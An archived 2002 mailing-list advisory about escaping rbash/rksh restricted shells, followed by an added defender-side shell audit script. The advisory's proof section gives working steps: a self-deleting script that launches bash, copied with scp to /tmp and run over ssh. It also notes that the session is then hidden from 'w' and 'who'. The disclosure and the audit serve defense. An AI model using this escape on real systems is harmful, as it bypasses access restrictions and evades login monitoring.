SECURITYVULNS:DOC:2810
Apr 19, 2002 - 12:00 a.m.

Restricted Shells

vulners.com

I have recently realized a security issue in some of the restricted shells on *NIX systems. I am not sure if I am the first one to discover the problem I am going to discuss, but I am sure that it has not been posted yet, at least not that I know of.

Basically this is the issue:

Affected Systems:
=================

Any Unix systems that I am aware of using restricted shells (rbash, rksh)

Description:
============

An authorized user that is set to use rbash or rksh is able to escape the restricted shell environment and then furthermore exploit the system. The problem comes from the fact that when a command is executed from the shell and it is found to be a shell procedure then rksh or rbash are invoked to execute it.

Proof:
======

One needs to store the shell script in a world-writable directory like /tmp or /usr/tmp, so let's assume the server is running sshd (this is also exploitable through rsh). In this case store in a file called anything you want (I will use .tmp123) the following:

    /usr/bin/bash
    rm -Rf /tmp/.tmp123


Then execute the following:

    $scp ./.tmp123 user@host:/tmp
    user@host's password:
    Done.

    $ssh -l user host '/tmp/.tmp123'
    user@host's password:
    _

You should now have a normal bash shell instead of the original rbash.

Also a great plus to doing this is that whenever you follow the procedure above the commands 'w' and 'who' cannot detect your presence. However 'ps' does show the intruder's presence.

Fix:
====

I am not aware of any except maybe an attempt to retune the system. If anyone has any ideas please e-mail me.

A. Dimitrov

System Administrator

Georgia College & State University
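The audit below is a defender-side check added to this archived post; it is not part of Dimitrov's message and is not a fix. It covers the three conditions the post names: accounts whose login shell is rbash or rksh, world-writable drop locations such as /tmp and /usr/tmp, and the mismatch between `ps` and `w`/`who`. The function names, the /etc/passwd excerpt and the ps/who user lists are constructed for illustration; only POSIX sh, awk, find and grep are assumed.

```shell
#!/bin/sh
# Defender-side audit for the rbash/rksh escape described in the post (added example).
# Each check takes its input as text so it can be exercised on constructed samples.

# Constructed /etc/passwd excerpt (not from the original post).
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
alice:x:1001:1001::/home/alice:/bin/rbash
bob:x:1002:1002::/home/bob:/usr/bin/rksh
carol:x:1003:1003::/home/carol:/bin/sh'

# restricted_accounts PASSWD_TEXT
# Prints "user shell" for every account whose login shell is rbash or rksh,
# i.e. the accounts the post's escape applies to.
restricted_accounts() {
    printf '%s\n' "$1" | awk -F: '$7 ~ /\/(rbash|rksh)$/ { print $1, $7 }'
}

# world_writable_dirs DIR...
# Prints each existing directory that is world-writable (mode o+w): the kind of
# drop location (/tmp, /usr/tmp) the post relies on for the uploaded script.
world_writable_dirs() {
    for d in "$@"; do
        [ -d "$d" ] && find "$d" -prune -perm -0002 -print
    done
    return 0
}

# users_without_login PS_USERS WHO_USERS
# PS_USERS is the user column of ps (e.g. ps -eo user=), WHO_USERS the first
# column of who, one name per line. Prints users that own processes but have
# no login record, the ps versus w/who gap the post points out.
users_without_login() {
    printf '%s\n' "$1" | sort -u | while IFS= read -r u; do
        [ -n "$u" ] || continue
        printf '%s\n' "$2" | grep -qxF -- "$u" || printf '%s\n' "$u"
    done
}

# Demo run on the constructed samples above plus the live filesystem.
echo "Accounts with a restricted login shell:"
restricted_accounts "$PASSWD_SAMPLE"
echo "World-writable directories among the usual drop locations:"
world_writable_dirs /tmp /usr/tmp /var/tmp
echo "Users seen in ps but not in who (constructed ps/who samples):"
users_without_login 'root
alice
sshd' 'root'
```

On a live host, feed `users_without_login` the output of `ps -eo user=` and of `who | awk '{print $1}'` instead of the constructed lists.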